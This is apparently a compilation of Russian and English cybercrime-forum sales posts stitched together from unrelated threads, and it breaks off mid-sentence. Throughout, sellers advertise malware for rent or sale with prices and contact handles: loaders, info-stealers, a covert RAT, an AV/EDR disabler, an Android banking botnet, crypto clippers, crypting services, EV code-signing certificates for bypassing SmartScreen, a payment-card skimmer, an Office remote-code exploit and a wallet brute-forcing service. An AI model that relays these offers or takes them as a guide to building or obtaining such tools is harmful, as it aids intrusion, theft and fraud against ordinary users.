После запуска лоадер подгружает белый софт (в панеле можно поставить любой, но это не обязательно), следом за белым подгружается дополнительный модуль лоадера который в последствии получает информацию о устройстве и запускает вашу полезную нагрузку. Автозапуск ваших файлов работает через модуль лоадера ( не на прямую в автозагрузке системы ).
СТОИМОСТЬ:
Стоимость месячной аренды – 500$.
После оплаты вы получите: панель лоадера + инструкцию, билд лоадера выдаёт
администратор отдельно! В случае окончания аренды панель ещё работает для
ботов, но для клиента уже нет, в любой момент есть возможность продлить аренду
и сохранить всю статистику. Мы предоставляем билд в форматах MSI / EXE (по
желанию можем дать два варианта), так же помогаем с обходом Chrome Alerts.
ВСЕ СДЕЛКИ ПРОВОДИМ ЧЕРЕЗ ГАРАНТА ФОРУМА.
НАБИРАЕМ ДО 10 КЛИНТОВ!
ТЕКУЩИЙ SCAN ДЕТЕКТОВ: 0 / 39
![www.kleenscan.com](/proxy.php?image=https%3A%2F%2Fwww.kleenscan.com%2Fimages%2Flogo- mini.png&hash=bab25ab6d795b1ccd68014eff4c74340&return_error=1)
](https://www.kleenscan.com/scan_result/0f9d1583cee6c6cf07b18d344e3f6233510a5e12366b031f22f55a0c00a359da)
Analyze files to detect malware. Analyze URLs, domains, and IPs to detect malware and blacklist status.
www.kleenscan.com
ПРАВИЛА:
Перепродажа лицензии на данное ПО запрещена.
Слив файлов на АВ сайты или в общий доступ запрещён.
Со своей стороны мы обеспечим постоянную поддержку, помощь и комфортное
использование нашего продукта. При каких любо вопросах готовы выйти на связь в
любое время и решить возникшие проблемы. Ищем долгосрочное сотрудничество и
добросовестных клиентов.
SCREENSHOT'S:
С уважение команда Manticora Loader.
Selling Website building service to generate automated downloads on your Malware.
Any niche you want.
Gaming, Cracks, Crypto, Personal
Get now your Website Copy and generate a Automated spread Method!
**Stealer i usehttps://xss.is/threads/73516/ by freeide
**
-----
Продажа услуг по созданию веб-сайтов для автоматической загрузки вашего
вредоносного ПО.
Любая ниша, которую вы хотите.
Игры, Трещины, Крипто, Личное
Получите копию своего веб-сайта и создайте метод автоматического распространения!
Stealer я использую https://xss.is/threads/73516/ от freeide
Увы, проект не пошел, на мой взгляд идея была превосходная.
Что делать с проектом я не знаю, раньше я им сам пользовалься и жил на этом
примерное 2 года хоть и проект планировалься в моей голове как MaaS и был
написан как MaaS, но всему приходит конец. И еще эта обнова с Google Chrome с
их новым методом получения ключа, у меня нету желания разбирать его. Трудно в
одного все держать.
Я хочу на самом деле этот проект уничтожить у себя, он меня выбешивает, но просто уничтожить слишком глупо, по этому продам сурсы за 2500$ в одни руки. Проект на мой взгляд не идеален и в нем наверное нужно что-то доделывать, но меня устраивал и я им пользовалься.
Что входит в сурсы?
Серверная часть:
База данных:
Аутентификация и безопасность:
Декодирование данных браузера на сервере:
Фреймворк:
Кеширование данных:
Клиентская часть (stub):
Сервер для создания билдов:
Frontend:
Nginx конфиги:
Telegram бот:
Как и писал выше вот видео, пролистывайте на 18 секунду ибо там черный экран.
В общем пишите в ПМ спрашивайте, узнавайте что интересно, я мог не все расписать так как трудно вспоминать что там вообще.
Spoiler: ПРОЕКТ ЗАКРЫТ | СТАРЫЙ КОНТЕНТ ТЕМЫ
**Цена:бесплатно. Стилер предоставляется бесплатно по модели MaaS **с условием, что мы можем добавлять/подгружать к вашим билдам другие программы:
Почему бесплатно?
Мы приняли решение предоставлять стилер бесплатно с условием, что мы можем добавлять или подгружать к вашим билдам вышеупомянутые программы. Логи принадлежат вам, но не хранятся вечно, мы удаляем их по мере необходимости, так как наши ресурсы не безграничны.
Что нужно для начала работы?
Для того чтобы начать работать с нами, вам нужно скачать веб-приложение на базе NW.js для доступа к панели управления. После чего вы можете сгенерировать билд и закриптовать у нас обратившись по контактам, которые найдёте в панели или воспользоваться сторонним сервисом.
Технические характеристики:
• Билд : C++
• Серверная часть : Node.js
• Фронт-энд : Vue.js
• Панель управления :
Панель включает доступ к публичным прокси, однако их наличие не гарантируется. Возможно, вам потребуется настроить собственный VPS/VDS на базе Debian/Ubuntu. Инструкция по установке находится в панели или можете лично обратиться ко мне, и я придумаю, как вам помочь.
Обратите внимание:
Мы не несем ответственности за сбои в работе программы, возможные неполадки или утрату данных в результате форс-мажорных обстоятельств.
Работа по России, странам СНГ и бывшим республикам СССР запрещена. За попытку работы в этих регионах аккаунт будет заблокирован без каких-либо объяснений.
Криптовать билд перед использованием обязательно.
Заливка билда на VirusTotal запрещена.
Мы оставляем за собой право блокировать аккаунты за любые действия, направленные против нас.
Будущее обновление:
В скором времени мы планируем запустить бесплатный автоматический крипт- сервис. Условия будут такими же: к криптованному билду мы оставляем за собой право добавлять программы, которые позволят монетизировать проект.
Вы можете получить панель, связавшись с нами по указанным контактам выше.
Spoiler: Скрины панели(не все)
Временно не актуально
Временно не актуально
Временно не актуально
Spoiler: English
What do you get?
*** Adds your file to the defender exception and runs. Completely bypasses cloud defender
Spoiler: VT screenshot + rantime with On internet + video
Link to scan:https://scanner.to/result/ceAm45jiQxp7
Archive contents
Cloud defender bypass video exe + dll
1 exe
Spoiler: info
Loader is not written in garbage languages like: python, nodeJS, .Net for
which high knockback is guaranteed.
The weight in the archive is 12~mb.
Loader consists of one exe file, or exe + dll.
Issued only with anti-vm.
Adds the folder of your file to the defender exception and starts it. It does
not turn off defender
Only the folder with your file is added to the exceptions (not the whole
disk).
Installs and encryptors are not allowed on the loader.
Output a url with a startup counter
Counts only unique runs. Checks hwid
Cost:
Loader 1 exe~~80$~~**~~/day~~ 350$/week1200$/month
Loader exe + dll ~~50$~~~~/day~~ 270$/week800$/month
Now selling week +
Build support for the entire subscription period
In case of critical detects we will replace the build of the loader
Write in telegram ------
ALWAYS ASK FOR A VERIF THROUGH THE FORUM
Immediately say about what and from where
If you need a tox, then write in the forum lis and immediately throw your
tox**
Guarantor at your expense
**Что вы получаете?
Spoiler: Скрин VT + рантайм с On интернетом + видео
Ссылка на скан:https://scanner.to/result/ceAm45jiQxp7
Содержимое архива
Видео обхода клауд дефендера exe + dll
1 exe
Spoiler: info
Loader не написан мусорными языками по типу: python, nodeJS, .Net из за чего
гарантируется высокий отстук.
Вес в архиве 12~мб.
Лоадер состоит из одного exe файла, или exe + dll
Выдается только с анти вм.
Добавляет папку вашего файла в исключение дефендера и запускает. При этом не
выключает дефендер
В исключения добавляется только папка с вашим файлом (не весь диск)
Инсталлы и шифровальщики на лоадер запрещены.
Выдаем url с счетчиком запусков
Считает только уник запуски. Сверяет hwid
Стоимость:
Loader 1 exe ~~80$~~~~/~~~~день~~ 350$ /неделя 1200$/месяц
Loader exe + dll ~~50$~~~~/~~~~день~~** 270$/неделя 800$/месяц
Теперь продажи неделя +**
Spoiler: Обход Smart Screen
Появилась возможность покупки лоадера с EV подписью
Лоадер будет обходить смарт скрин
Цена 1100$ неделя
Также, вы можете купить наш обычный лоадер без подписи и подписать его самостоятельно.
Вы можете заморозить свою подписку, но максимум на неделю
Поддержка билда на весь срок подписки
В случае возникновения критических детектов заменим билд лоадера
На время исправлений подписка замораживается
ИНСТАЛЛЫ ЗАПРЕЩЕНЫ
ШИФРОВАЛЬЩИКИ ЗАПРЕЩЕНЫ
Пишите в телеграм ------------
ВСЕГДА ПРОСИТЕ ВЕРИФ ЧЕРЕЗ ФОРУМ
Тг канал с новостями ------------
Лоадер не резидент
Нарушение правил - забираем доступ к лоадеру без возврата средств
Сразу говорите по поводу чего и откуда
Если нужен токс, то пишите в лс форума и сразу кидайте свой токс
Гарант за ваш счет
Spoiler: Скамеры
RU
Продаю av/edr disabler. Основное преимущество - процессы АВ\EDR СКАНЕРОВ не
завершаются, т.е. ВНЕШНЕ защитное решение продолжает функционировать, но ПО
ФАКТУ сканирование файлов\памяти не выполняется.
Работоспособность проверена на windows 7sp1-11, windows server 2008 r2 - 2022
со следующими AV\EDR: Bitdefender, CrowdStrike, Cylance, Palo Alto Networks,
Kaspersky, DrWeb, ESET, Avast, Avira, Symantec, Sophos, Sentinel One,
TrendMicro, Webroot, Windows Defender 10/11.
Месячная поддержка каждого AV/EDR - 1500$, минимальный заказ - 7500$. Если
нужного вам AV/EDR нет в списке - пишите, постараемся добавить. Набираю не
более 7 клиентов. Гарант приветствуется.
Перед заключением сделки предоставляю видеодемонстрацию с запуском mimikatz и
актуальные сканы АВ\EDR по scanner.to.
EN
Selling av/edr disabler. The main advantage is that the processes of AV/EDR
SCANNERS are not terminated, i.e. externally the protection solution continues
to function, but in fact the scanning of files/memory is not performed.
Tested on windows 7sp1-11, windows server 2008 r2 - 2022 with the following
AV/EDRs: Bitdefender, CrowdStrike, Cylance, Palo Alto Networks, Kaspersky,
DrWeb, ESET, Avast, Avira, Symantec, Sophos, Sentinel One, TrendMicro, Windows
Defender 10/11.
Monthly support for each AV/EDR is $1500, minimum order is $7500. If the
AV/EDR you need is not in the list - write, we will try to add it. I recruit
no more than 7 clients. Escrow is welcome.
Before concluding the deal I provide a video demonstration with the launch of mimikatz and current scans AB\EDR on scanner.to.
Всем привет!
С уходом последней популярной версии продукта тема с РМС угасла и сейчас я хотел бы снова ее поднять.
Что такое RMS?
RMS - это легитимная программа для удаленного управления Windows (RAT) по типу Radmin, TeamViewer и тп.
Что собой представляет мой продукт?
Мой продукт - это способ модификации RMS, позволяющий скрыто устанавливаться и управлять чужим компьютером.
Билдер - автоматизированный патчер и сборщик компонентов, в зависимости от настроек выбранных вами: выбор имени хоста, пути установки, иконки, информации о файле, ветки реестра, емейла для сбора ID, а так же другие функциональные настройки.
Функционал:
- Стандартный для RAT, позволяющий полностью управлять компьютером. Больше не имеет просмотра веб-камеры. Не имеет ботовидного функционала.
- Есть возможность управления через протокол RDP, в обход NAT (имеется модуль параллельного RDP)
- Отправка ID производится на ваш Email.
Особенности:
Вы получаете билдер с гибкими настройками, которые будут пополняться с обновлениями.
Обходит NAT, не требует от вас настройки IP, DNS, как для обычных RAT
Имеются методы обхода UAC Win 7, 10 (ничего сверх приватного)
Имеет 2 типа скрытой автозагрузки и 1 стандартную
Функция Anti-VM - запрещает запускаться на виртуальных машинах, что позволяет хосту дольше оставаться чистым и свежим
Склейка с вашими файлами
Восстановление файлов после удаления
Естественно, скрытая установка
Управление через вьювер.
Размер билда не скромный - от 4,5 мб.
Что по детектам?
На данный момент не требует крипта.
Поскольку RMS является легитимным софтом, то антивирусы очень медленно и неохотно(ха-ха) заносят его сигнатуры в свои базы. Таким образом, достаточно лишь иногда чистить хост от единичных появляющихся детектов и вам не потребуются услуги криптора.
Услуги чистки так же предоставляются мной.
Если же вы уверены в своем крипторе, то возможность криптования присутствует.
Scantime:
https://checkzilla.io/scan/7bdac062f23f5a4984874675f220cbbf
Runtime:
На минималках https://checkzilla.io/scan/9641ef78edf468e46600d6ac2d319429
С автозагрузками: https://checkzilla.io/scan/483b1385b631aec3ecf95bbdacc5f772
Цена
- Базовый пакет обойдется вам в 400$, купив его вы получите: сам билдер, патчер RMS, модуль RDP и все обновления в будущем.
- Привилегированный пакет будет стоить 650$ и помимо прочего будет включать бесплатные чистки в течении двух месяцев. Так же, ваше мнение будет в приоритете при дальнейшем развитии проекта.
- Если вам потребуется чистка хоста, то цена будет зависеть от числа детектов. От 50$.
Гарант
Приветствуется, за ваш счет
Контакты
Jabber: murlocks@xmpp.jp
Или через сообщения форума
Этот проект является развивающимся, если вас интересуют какие-либо функции которых сейчас нет, то их всегда можно добавить в меру моих сил и возможностей. Вектор развития проекта определяется покупателями.
features encryption :
100% unquie polymophric for each file , run in memory without touching the
disk , bypasses most of edr's
features of exploit :
Win 10 , win 11, win 7, Windows Server 2022/2019/2016.
Decoy added , adding PDF/TXT/IMG file that will display to the taget.
defender exclusion , adding your file to windows defender exclusion list.
persistence , persistence when the user logs in
UAC bypass , win 10 tested
smartscreen / google chrome bypass
EDR's Bypassed ( Sophos, Kaspersky, Sentional, Crowdstrike )
optional Features :
Removing ALL windows updates installed
Disable Automatically windows update
Disable Microsoft Office Security Features
Remove Windows Defender Definition Files
kill any edr's , Crowdstrike Falcon , ksapersky , etc
Disable/Kill Defender
Disable the SR scheduled task (System Restore)
can provide alot of files daily
I DEAL THROUGH GURANTOR BUT MONEY RELEASE AFTER YOU TEST FILES ON YOUR RDP
DO NOT ASK ME TO USE FILES FIRST THEN PAY !!
contact me on tox for more info and demo only people with good budget
tox : CA701B09617BF693F68AEF0985166097555C76DDF318E6E803E7CB7C7A88260D4A81A86AFA17
russian :
Особенности шифрования:
100% неактивный полиморфизм для каждого файла, работает в памяти, не затрагивая диск, обходит большинство edr
Особенности эксплойта:
Вин 10, Вин 11, Вин 7, Windows Сервер 2022/2019/2016.
Добавлен хук, добавляющий файл PDF/TXT/IMG, который будет отображаться в теге.
Исключить Защитника: добавьте файл в список исключений Защитника Windows.
постоянство, сохранение при входе пользователя в систему
Обход UAC, проверено на Win 10
обойти смартскрин/гугл хром
Обход EDR (Sophos, Kaspersky, Sentional, Crowdstrike)
дополнительные возможности:
Удаление ВСЕХ установленных обновлений Windows
Отключить автоматическое обновление Windows
Отключите функции безопасности Microsoft Office.
Удалить файлы определений Защитника Windows
убейте любого edr, Crowdstrike Falcon, xaper и т. д.
Выключить/убить защитника
Отключите запланированную задачу SR (восстановление системы).
может предоставлять много файлов ежедневно
Я ДЕЛАЮ ЭТО ЧЕРЕЗ ГАРАНТА, НО ДЕНЬГИ ВЫДАЮТСЯ ПОСЛЕ ПРОВЕРКИ ФАЙЛОВ НА ВАШЕМ RDP, НЕ ПРОСИТЕ МЕНЯ СНАЧАЛА ИСПОЛЬЗОВАТЬ ФАЙЛЫ, А ПОТОМ ПЛАТИТЬ!!
свяжитесь со мной по tox для получения дополнительной информации и демонстрации только для людей с хорошим бюджетом
tox : CA701B09617BF693F68AEF0985166097555C76DDF318E6E803E7CB7C7A88260D4A81A86AFA17
Большинство уже знакомы с проектом «Amadey» по треду на Эксплоите, а для тех кто впервые слышит об этом лоадере расскажу подробнее:
Фичи:
● Как лоадер (с++), так и панель (PHP) писалась с нуля, не являются
модификацией других программ
● Полная совместимость со всеми версиями Windows семейства NT начиная с
Win7 и новее, включая Win11/Server 2022, 32/64
● Имеет полный набор стандартных функций (выбор стран, лимит загрузок и т.д.)
● Имеет контроль загрузки и запуска , повторяет попытку до 3х раз в случае
неудачи, рапортует в СС - вы можете видеть в реальном времени статистику
задания (Progress), есть ли проблемы с загрузкой или запуском, а так же
реальное количество успешно запущеных копий (Success)
● Работа с DLL через rundll32
● Контроль автозагрузки ваших файлов! (Amadey может запускать ваши файлы
после ребута ОС или вы можете использовать собственный авторан вашего файла -
опционально)
● Автозапуск не из реестра Windows
● Точное определение версии ОС по minor/major и ее разрядности
● Возможность дать персональное задание каждому юниту
● Выход из LOW уровня интеграции
● Определение 12-ти основных антивирусных пакетов (в дальнейшем расширим)
● Поддержка синхронизации через FastFlux и тому подобные "прокладки"
● Не работоспособен на территории Российской Федерации и братских стран
(функционал ограничен отстуком)
● Все внутренние константы под DESом, уникальный ключ шифрования для каждого
билда
● СС легок в развертывании, создание таблиц и подключение БД осуществляется из
инетрфейса СС
Плагины:
● Реверсный прокси.
● Клиппер (Btc, Eth, Lte, Dgc, Monero).
● Стилер (Chrome-based Browsers, Mozilla Firefox Browser, Tor Browser, Pidgin,
Gajim, Psi+, WinSCP, FileZilla, Microsoft Outlook, Mozilla Thunderbird,
WalletsExodus, WalletsElectrum, Armory, WalletsDogeCoin, WalletsLiteCoin,
WalletsDashCore, WalletsMonero, Telegram Sessions, Desktop Files)
Гарантии:
● Работа через гаранта приветсвуется!
Детекты:
● Регулярно провожу чистку кода от детектов, в основном уделяю внимание
Windows Defender.
Лицензионное соглашение:
● Софт соответствует всем заявленым характеристикам (размер файла и детекты
могут менятся со временем и не могут быть основанием для претензии)
● Покупатель приобретает софт "как есть". Все, неописаные тут, характеристики
можно уточнить у саппорта
● Продавец обязан своевременно поддерживать софт до тех пор, пока он не
потеряет актуальность
● Продавец не несет ответственности за действия покупателя и их результат
● Перепродажа лицензии по-умолчанию запрещена
● Не допускается передача кому-либо файлов или скриптов
● В случае грубого нарушения покупателем этого соглашения лицензия может быть
аннулирована без возврата средств
● В случае обнаружения проблем, недароботок или уязвимостей в ПО продавец
обязан их исправить максимально быстро или расторгнуть данное соглашение с
возвратом средств покупателю
● Все спорные вопросы решаются арбитром форума в соответствии с правилами,
положениями и здравым смыслом
● При совершении сделки обе стороны принимают данное соглашение
● После совершения оплаты сделка считается совершенной
**Требования для установки СС:
PHP **7-ой и выше линейки, SQL
Рекомендуется unix-base OS, например Linux
Цены:
$600 в BTC единовременно за лицензию
$50 в BTC единовременно за каждый ребилд
$50 в BTC единовременно за за каждую новую установку СС мною. Вы можетее
установить её самостоятельно, актуальная версия всегда в комплекте с билдом.
Контакты:
increase@exploit.im
По всем вопросам в jabber или PM.
Проекты под android / Среда разработки Android Studio язык Kotlin.
не пишу такие проекты как анубис цербер и им подобным...
Напишу отдельные функции ,перепишу проект с java на kotlin , компиляция и фикс
ошибок в проектe,соберу интересующий вас проект с github.
Работа через гаранта обязательна ,на перёд исходный код не отдаю - демонстрация вашего проета в разных вариациях.
Tremendous | Android Botnet
updated on 01.07.2023
You can do what you want with this code . You can resell it / dump it . I will not take any action .
For sale only in one hand .
Price : 3000$
Telegram : @WinstonAndroid
Spoiler: Functionality
• Filtering/Searching
• Privilege control
• Comprehensive statistics
• Automatic commands
• Phishing
• Smart injections (interaction with the holder in real time) ( 1500 units)
• Call History
• Get a contact
• Add a contact
• Location
• Get images
• Open the application
• Send a whatsapp message
• To call
• VNC HVNC
• File manager
• Redirect SMS
• Send SMS
• Send SMS to user contacts
• USSD
• Call Forwarding
• Send push
• Get Accounts
• List of installed apps
• SMS list
• Open the injection
• Update the list of injections
• Open the link
• Delete the app
• Reading Gmail
• Get admin rights
• Take a screenshot
• Clear app cache/memory
• Turn off PlayProtect
• Key logger
• Hide SMS
• Turn off the sound
• Read push
• Clear push
• Lock the device
Spoiler: Закрыто на депозит. Closed for deposit.
Glitch clipper
Спустя долгие месяцы усердной разработки, отладки и тестирования в боевых условия представляю Glitch Clipper!
️Почему Glitch Clipper?
Поддержка адресов в 18 блокчейнах
Spoiler: blockchains
Не
нужно никаких панелей и возни с установками: покупка и настройка клиппера
осуществляются прямо через Telegram бота
проекта
FUD
(0/26)
Native
билд: доступны 32- и 64-битные версии
Работа
офлайн: клипер подменяет адреса даже без подключения к Интернету
Могу
добавить новый блокчейн, если он отсутствует в билдере
Быстрая
скорость работы: адреса подменяются буквально за долю секунды
Работа
на Windows, начиная с версии Vista/Server 2008
Уникальный
алгоритм подбора адреса из заданных: вероятность обнаружения подмены крайне
мала
Быстрая
и отзывчивая техподдержка: помогу в решении
вопросов и выслушаю предложения по улучшению
Уведомления
в Телеграм: следить за своим трафиком стало как никогда удобно
Готов
работать через любого проверенного гаранта
Внесён
депозит на форуме
На
СНГ тачках не отрабатывает и не будет отрабатывать
За
отзыв/на тест не даю. Переживаешь за свои бабки - используй гаранта/кошелёк с
мультиподписью.
Уже активные пользователи могут получить дополнительные дни подписки, оставив
отзыв
Цена подписки
1
месяц: ~~70$~~ -> 50$
3
месяц: ~~150$~~ -> 130$
LifeTime:
~~700$~~ -> 500$
️Успей купить, пока идёт акция при открытии️
Контакты:
Telegram support: https://t.me/glitch_support (ID: 6576043437)
Telegram
channel: https://t.me/Glitch_news_channel (ID: -1001973186772)
Telegram bot: https://t.me/GlitchProject_bot (ID: 7268858071)
Xss pm: https://xss.is/members/352490/
**Доброго времени суток! Криптую ваши .exe файлы.
Особенности:**
Модули:
Прайс:
Связь: https://t.me/Cryptl1
Так же имеется депозит на эксплойте.
Spoiler: Русский
Scanner.to - Полностью автоматизированный динамический сканер
Сканируйте свои файлы в динамическом режиме и получайте четкие и точные
результаты.
Простой и удобный в использовании с минимальным временем ожидания.
Для регистрации достаточно ввести имя пользователя и пароль.
Проверьте ваши файлы на различные виды обнаружений: статические, динамические
(в режиме реального времени), облачные, поведенческие, сканирование памяти,
HIPS, брандмауэр.
Почему нас выбирают?
*Мы отключили телеметрию и отправку образцов в антивирусных программах; тем не менее, чтобы убедиться на 100%, что утечки вашего файла нет, пожалуйста, сканируйте его с отключенным интернетом. Мы не можем контролировать то, что антивирусное программное обеспечение делает с вашим файлом.
Список антивирусов:
Стоимость
TOX: 81A9E67702D5AB17E1CF43296D6FAE7EB8DE6B2DDD69D58404CB19477CCA6B64F137EB3F64DF
скан: https://scanner.to/languages/ru
Scanner.to - Fully Automated Runtime Scanner
Scan your files dynamically and get precise and detailed results.
Easy and convenient to use with the least waiting time.
Registration with username and password only.
Check your files for various types of detection: Static, Dynamic (real-time),
Cloud, Behavioral, Memory scan, HIPS, Firewall
Why us?
*We disable telemetry and sample submission in anti-virus software; yet to be 100% certain that your file is not leaked, please scan with disabled internet. We cannot control what anti-virus software does with your file.
Anti-virus list:
Price?
TOX : 81A9E67702D5AB17E1CF43296D6FAE7EB8DE6B2DDD69D58404CB19477CCA6B64F137EB3F64DF
Scan now : https://scanner.to
**_EV CODE SIGNING CERTIFICATES VALID
With code signing, users can trust the software they are downloading, and need not worry about downloading malware onto their computer. A code signing certificate issued by a trusted certificate authority._
Сертификаты в наличии или под заказ**
Сертификаты по предварительному заказу: срок изготовления 2-5 дней
Обсуждение оптовых заказов
Сертификаты продаются строго в одни руки. Свежие и не использованные
Мы можем создать название компании в соответствии с вашими требованиями
Что такое EV Code Signing?
Моментальный обход фильтра SmartScreen, не требующий набора репутации
Делает доверенным UAC
Подписанный софт вызывает большее доверие у пользователя, что существенно
повышает конверсию
Обход некоторых антивирусов, основанных на обнаружении сигнатур
Варианты доставки
Облачная служба подписи кода / Токен FIPS 140-2
FAQ
Сертификаты действительны в течение 1 года, возможно продление
Обычно они есть в наличии, предварительно уточняйте
Сертификаты могут быть отозваны, если центр сертификации получит слишком много
жалоб на злоупотребление, для белого софта можно использовать в течение всего
времени
**Новые цены на сертификаты:
ssl.com с обязательным сканом сигнатуры файла - 1500$(под заказ от 5дней) / 2100$(в наличии)
certum.eu (без скана, живёт на данный момент дольше всех) - 2100$(под заказ от 5 дней) / 2500$(в наличии)
New prices for certificates:
ssl.com with a mandatory scan of the file signature - $1500 (on order from 5 days) / $2100 (in stock)
certum.eu (without scan, currently lives the longest) - $2100 (on order from 5 days) / $2500 (in stock)**
TG: https://t.me/Mavr_MMM
Auto sale: https://t.me/D3Fuck_Loader_newbot
TOX:900A0967686AD981E3282B4D4BC436432BE8B0A3A7DD8734B007D21EE535B334D6E97196B5A1
Перед заказом сверяйте контакты !
Certificates on order or in stock
Certificates upon pre-order: production time 2-5 days
Discussion of wholesale orders
Certificates are sold strictly to one person only. Fresh and unused
We can create a company name according to your requirements
What is EV Code Signing?
Instant bypass of the SmartScreen filter, which does not require gaining a
reputation
Makes UAC trusted
Signed software inspires more confidence in the user, which significantly
increases conversion
Bypass some antiviruses based on signature detection
Delivery options
Cloud Code Signing Service / FIPS 140-2 Token
FAQ
Certificates are valid for 1 year, extension possible
They are usually in stock, please check in advance.
Certificates can be revoked if the certificate authority receives too many
complaints about abuse, for white software can be used at all times
**Новые цены на сертификаты:
ssl.com с обязательным сканом сигнатуры файла - 1500$(под заказ от 5дней) / 2100$(в наличии)
certum.eu (без скана, живёт на данный момент дольше всех) - 2100$(под заказ от 5 дней) / 2500$(в наличии)
New prices for certificates:
ssl.com with a mandatory scan of the file signature - $1500 (on order from 5 days) / $2100 (in stock)
certum.eu (without scan, currently lives the longest) - $2100 (on order from 5 days) / $2500 (in stock)**
TG: https://t.me/Mavr_MMM
Auto sale: https://t.me/D3Fuck_Loader_newbot
TOX:900A0967686AD981E3282B4D4BC436432BE8B0A3A7DD8734B007D21EE535B334D6E97196B5A1
PS: Окажем услугу разовой подписи 350$/ 1 файл / We will provide a one-time signature service $350/1 file
Spoiler: Закрыто на депозит: $10k
**Всем привет.
Открылось несоклько слотов аренды приватного софта.**
- C++
- Web Panel
- Работает на транспортном уровне
- FUD
- Запутывание
- Защита от песочниц и реверсов
- Работа через прокси
- Работа через сокс5
- Автоматизация действий и команд
- Автоматизация и выполнение условий
- Полный доступ к цели через powershell / cmd / bash
- Полноценный Reverse Shell
- Browsers Stealer
- Keylogger
- Clipper
-File Stealer
- Screen shooter
- Компил нагрузки прямо в панели
- Payload Win x32, Win x64, Linux (Android и Mac Os скоро)
- Создание шаблонов команд
- Отправка команды на все цели
- Различные фишки - кодирование команд и проч
- Закрепление в системе
И многое другое
**Стоимость аренды: 4500$ / месяц
Писать только ПМ.
Демо и тесты - беслпатны
p.s**
LEGAL DISCLAMER
The author does not hold any responsibility for the bad use of this tool,
remember that attacking targets without prior consent is illegal and punished
by law. So use this tool responsibly.
Рад предоставить свой продукт для передачи нужной платежной информации с сайтов на ваш сервер.
Опишу доступные разделы в админ панели на сегодняшний день
Login и Registration:
Добавлена 2fa Google
Dashboard:
Статистика кол-ва карт сегодня, вчера, неделя, месяц
Статистика по странам
Cards:
Вывод сайтов с которых уже пришли карты в админку
Вывод кол-ва карт с каждого сайта
Общий дамп всех карт с данными в формате "Card
Number|Month|Year|CVV|F.Name|L.Name|Country
ID|State|City|Street|Postcode|Telephone|Email|IP|UserAgent|Full_log|URL|DATE"
Дамп отдельно каждого сайта в таком же формате
Вывод данных на страницу
Details:
Здесь происходит настройка полей для каждого сайта.
Можете назначать в ручную для каждого поля свое значение (Например в данных
поле street[0]-7 назначаем, как billing_street)
Блокировка ошибочных полей.
Inject:
Настройка сайтов источников (Для того, чтобы никто другой не смог получить код
снифа)
Редактирование js кода в админ панели - Вам больше не нужно лазить постоянно
на шоп, где стоит код
2 метода автоматической обфускации. Вы только вставляете нужные данные.
Возможность создавать фейк формы, iframe , редиректы ( P.S iframe не
перехватывается. Только созданием фейка и заменой)
Устанавливать конечную точку с которой будет работать снифф. Например вам
нужно, чтобы он работал только на /checkout
Технические особенности:
Бесшовная установка - во вкладке source нет никаких файлов
Нет постоянных запросов в сети, которые полят сниффер
Есть способ обхода sucuri
Не используем base64
Уникальная генерация Inject кода для каждого сайта
Краулерам, ботам, другим людям будет показываться только нужный нам текст
В данный момент есть 3 способа различных отсылки данных. В текущей версии
реализован 1, но продукт будет улучшаться.
Для работы вам лучше использовать ( 1 - для админ панели, 2 - для сниффера).
Гейт может работать как на ваших серверах, так и на веб шеллах
Это краткое описание , много всего находится под капотом.
Цена продукта на старте - 1500$
За руку проведу до полной установки.
За контактами в ЛС.
Есть тема на экспе с отзывами:
forum.exploit.in/topic/237353/
closed
Продаю RCE office word
- Выполняется команда powershell
- Протестировано и работает на windows 7, 10, 11.
- Работает: В офисе 2013, 2016, 2019 (сразу предупреждаю! на офисе 365 не
работает, эксплоит не может работать везде на все и вся!!!)
- Продажа только человеку с репутацией на данном форуме! так как продукт специфический, чтобы я был уверенным в серьезности человека, у вас должен быть депозит на форуме.
- Все важные тех. моменты только покупателю и только при сделке.
- Первый контакт в пм.
- Гарант на покупателе! Гарант только данного форума, admin
- Стоимость на сегодня 150.000$, в битках.
- Скрины и видео ниже в описании:
windows 11
windows 10
windows 7
Чек на АВ:
I am selling the best HVNC on the market, with all features(browser data
clone, start chrome, edge, brave, explorer and a lot more)
Currently price is only 60 EUR/month (price may change).
PAYMENTS METHODS: Paypal and CRYPTOS
Spoiler: Закрыто на депозит: $10k
Доброго времени суток!
Отработаю ваш валид MAIL.COM / AOL / YAHOO / HOTMAIL на blockchain.com.
Принимаются почты с запросами [no-reply@blockchain.info](mailto:no- reply@blockchain.info) / noreply@blockchain.com / notify@wallet- tx.blockchain.com,
Так же беру **индивидуальные кошельки с балансом под брут - любые крипто- кошельки
Схема отработки:**
получение всех идентификаторов кошельков
автоматический анализ аккаунта, генерация уникальной БД возможных паролей, до
400 гб. на 1 аккаунт
подбор пароля со скоростью 5 млн. / сек. (для v3/v4) и до 1 млрд. / сек. (для
v0) на собственном оборудовании (4х 6 х RTX 3080)
Все ПО - авторское, разрабатываемое с 2018-го года, абсолютный процент подбора
Если баланс подобранных в сумме менее 250 $ - отдается полностью. Если более - 50/50, выплата в BTC (даже если баланс аккаунта - в ETH, к примеру). Проверяются все валюты.
Связь:
Telegram - https://t.me/Alexblockk
jabber - alexblockk@thesecure.biz
Присылайте в ЛС или телеграм БД и bitcoin адрес для вывода.
Список поддерживаемых доменов:
YAHOO imap +web
hotmail imap+web
AOL
mail.com и 300 поддоменов
ua
Любые imap демены
Внимание! Если вы отсылали свои БД\аккаунты другим отработчикам - с радостью перебрутим их еще раз.
На рынке присутствую с 2014 года, более 1000 отзывов на других бордах.
Несколько скриншотов из последних результатов.
Буду рад сотрудничеству!
blockchain.com \ metamask \ s.che
You can contact @Alexblockk right away.
t.me
ПРОВЕРЕННЫЙ КРИПТ-СЕРВИС
Дамы и господа, мы предлагаем постоянный крипт-сервис по подписке. Недельная
подписка - 500$(WMZ/BTC), разовая 50$, суточная 100$.
We offer week crypting subscribe for 500$, 1 day crypting 100$, one-time
crypting 50$.
CONTACT: mrlapis@exploit.im
Самые современные технологии
***** Автоочистка по мере детекта без участия программиста и залив на ваш FTP.
***** Криптуем EXE и DLL x86. x64 не поддерживается.
***** Самый современный антиэмуль.
***** Полиморф с настраиваемой мощностью.
***** Любые изменения под ваши требования - иконки, можно из DLL сделать EXE.
***** Палево - 0/36.
***** Последние разработки против зубров Avira,
BitDefender и NOD.
***** Готовы сотрудничать по разным вопросам.
Наши преимущества
[ Опыт, стабильность и сотрудничество] Мы давно работаем и наши клиенты
спокойно работают используя чистые файлы. Доработки и исправления под вас
спокойно обсуждаются и реализуются. Мы не пропадаем внезапно, оставив вас с
палящимися файлами. Мы находимся на рабочем месте, чтобы оперативно решать
возникающие вопросы.
[ Работает везде] Наш код протестирован на многих ОС, в боевых условиях, в
